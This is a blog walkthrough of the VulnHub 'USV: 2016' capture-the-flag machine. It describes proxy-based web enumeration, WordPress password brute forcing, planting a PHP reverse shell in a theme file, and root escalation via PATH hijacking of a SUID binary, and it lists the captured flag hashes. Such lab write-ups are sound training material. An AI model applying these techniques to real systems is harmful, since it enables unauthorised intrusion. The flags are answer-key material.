USV: 2016 v1.0.1

[ vulnhub  ctf  walkthrough  ]

Goal

Capture all 7 flags in Country_name Flag: [md5 hash] format

Download

https://www.vulnhub.com/entry/usv-2016,175/

Walkthrough

Initial nmap shows ssh on 22, web on 80, proxy on 3129, mysql on 3306, and ftp on 21211
alt text

Looking at ssh first and it revealed an ascii dragon and what looks like a hash or encrypted string.
alt text

Looking closer, the dragon has AES-ECB written near the top so a quick Google search finds a decoder aesencryption.net. Took a stab at the key being xxxxx0000000xxxxxx that is also shown in the dragon.
alt text

Result was flag1
alt text

Italy Flag: 0047449b33fbae830d833721edaef6f1

Knowing no credentials for ssh, I browse the website for clues but immediately got access forbidden
alt text

Running dirb against gave the same error
alt text

Stuck, I remembered that a squid proxy was revealed during the nmap.
alt text

As always, I run everything through burp suite so I added the proxy setting as an upstream proxy
alt text

The proxy setting did the trick and the website reveals a single page with a changing banner of “WINTER IS COMING” and “ALL MEN MUST DIE”. Great…Game of Thrones, a show I know nothing about :(
alt text

The site didn’t show much of anything else so I run it through dirb again with the proxy settings. It reveals a WordPress site at /blog
alt text

*snippet of dirb

Game of Thrones notion confirmed as The Seven Kingdoms blog is revealed
alt text

Since it’s WordPress I run the site through wpscan and it reveals a base64 encoded string for an X-XSS Protection header
alt text

*snippet of wpscan

Decoding the string reveals flag2
alt text

Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb

Nothing else is revealed in wpscan so going back to the site reveals an interesting second post with a title of “I have a message for you!”
alt text

There is nothing else to the post so looking at the image location reveals a much different path than the normal WordPress directory of wp-content/uploads
alt text

Moving up one level reveals the message and a download link which turns out to be a zip file
alt text
alt text

Unzipping the file reveals an image file named hodor and the picture shows an base64 encoded string
alt text

Decoding the string reveals flag3
alt text

Portugal Flag: a2663b23045de56c7u96a406429f733f

Back to the site there are several long winded irrelevant posts in a row and then an interesting last one titled “Protected: The secret Chapter”
alt text

*This one took some time and to spare your time I won’t go through my failures

Looking back at all the several long winded irrelevant posts, I decided to create a word list file out of them by using cewl
alt text

Running the new word list through burp intruder also failed
alt text
alt text

With that I decided to look into how the password was being passed after submitting. Turns out it does a post and then a get with the addition of a cookie that encodes the password
alt text
alt text

With that information I setup burp intruder to include redirection and cookies
alt text

Left the scan running overnight as it’s a long process, but it finally revealed the keyword of Westerosi, a base64 encoded string and a new clue of “The mother_of_dragons has a password which is in front of your eyes”
alt text

Decoding the string reveals flag4
alt text

Paraguay Flag: 4761b65f20053674657c7e6186628a29

Tested the password on the actual post and it reveals a picture
alt text

Knowing nothing of Game of Thrones I resorted to Google to see if there were any clues about Daenerys Targaryen’s eyes. Apparently the actress is known for her eyebrows so I tested every combination of eyebrow and brow that I could think of. No luck.

Stumped I looked at the clue again. The clue states “has a password which is in front of your eyes”…wait…it can’t be that easy. Could the password be “in front of your eyes”? Nope.

Then I remember there are other services ssh, mysql and ftp. Testing ssh fails and mysql shows that no remote connections allowed. However ftp works and reveals two text files, readme.txt and .note.txt
alt text

The readme.txt file hints to look for a hidden file (already done) and the .note.txt file states that mother_of_dragons WordPress password are her children’s name
alt text

Back to Google and I find that Daenerys Targaryen has no children, but three dragons with the names of Rhaegal, Drogon and Viserion. So I put those names into a file along with various combination of all names combined
alt text

Running the list through wpscan reveals RhaegalDrogonViserion as the password
alt text
alt text

*snippet of wpscan

Now to test those credentials on the site…
alt text

and we’re in!
alt text

Looking around the site I found the profile section which reveals a base64 encoded string for mother_of_dragons
alt text

Decoding the string reveals flag5
alt text

Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733

With only two flags left I figured it was time for shell access. As an admin of the site I’m able to edit the theme, so I replace the footer.php page with a php reverse shell from pentestmonkey and setup my listener
alt text

Boom!…limited shell as user http
alt text

Lookin at the passwd file, it shows the home directory for http at /srv/http
alt text

Changing to /srv/http directory reveals the website files and directory, an interesting file named ‘winterfell_messenger’ that we’ll come back to, and a text file named ‘reward_flag.txt’. Reading the reward file reveals a base64 encoded string
alt text

Decoding the string reveals flag6
alt text

Mongolia Flag: 6b49c13cccd91940f09d79e142108394

*Again, this one took some time and to spare your time I won’t go through my failures

Back to the interesting file winterfell_messenger, we see it’s executable, SUID is set and the owner is root. Running the program shows that it’s using cat to read a file in the /root directory
alt text

Using strings it’s revealed that cat is being used, however it’s not using the full path to the program. From this we know that it will search the set PATH to run.
alt text

Now we’re able to update PATH by using export, but first we need to find a writable directory and per usual we’ll use /tmp
alt text

*snippet of output

Using export I add /tmp to be checked first
alt text

Now we need to create a executable file in /tmp named cat so it can be called by the winterfell_messenger program. Seeing that this file will be run as root, why not call a shell using /bin/sh
alt text

And now running the winterfell_messenger program…root
alt text

Viewing the /root directory reveals .flag.txt file
alt text

Before showing the contents of the file, the PATH needs to be updated to remove the /tmp directory we added
alt text

Now running cat against the .flag.txt file we get a congratulations, a cute ascii wolf, and a base64 encoded string
alt text

Decoding the string reveals flag7
alt text

Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34

Written on January 1, 2017
Share on: